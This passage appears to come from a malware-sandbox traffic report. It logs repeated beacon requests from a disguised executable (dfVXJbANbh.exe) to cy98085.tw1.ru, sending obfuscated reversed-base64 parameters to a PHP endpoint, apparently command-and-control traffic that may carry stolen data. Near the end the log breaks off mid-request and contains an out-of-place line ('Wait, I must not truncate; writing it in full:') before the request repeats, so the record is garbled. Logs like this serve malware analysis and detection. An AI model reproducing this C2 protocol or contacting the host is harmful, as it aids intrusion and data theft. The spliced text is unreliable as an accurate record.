                    Date: Sat, 23 Nov 2024 01:20:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.6 | 49775 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:23.853331089 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:25.217832088 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.6 | 49790 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:30.347333908 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:31.825900078 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.6 | 49812 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:36.955472946 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:38.469568014 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.6 | 49831 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:43.596457005 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:44.961993933 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.6 | 49847 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:50.096213102 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:51.460709095 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.6 | 49862 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:56.596008062 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:58.063668966 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.6 | 49878 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:03.354399920 CET | 2183 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=QX9JiI6ICNwgTNiVDOlJWYiZTMzY2MmBzYwM2MwETMjdDNkRmMlJCLiQTMkFzYkNTZilTMjFDOwczMyQTOiJzYiNWOlljMyE2MhVDOwMWOycjI6ISNwUmMiRjZyIDNiVGNkBjYmJDO1MTZ3M2NwEGO0EmN1ICLiITN1gjZwcTYmdTM4UzN2MjZwQWZxIDNlFjNyIDOhNmYmRTYlBDO4EjI6IyN3ETYjZmZwI2YiVGMjFWMjZGOxUjZwMTOlhTM3YGOjJyes0nIwglT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:04.826591015 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    12 | 192.168.2.6 | 49895 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:09.956015110 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWd[...]

Wait, I must not truncate; writing it in full:
                    Nov 23, 2024 02:21:09.956015110 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY 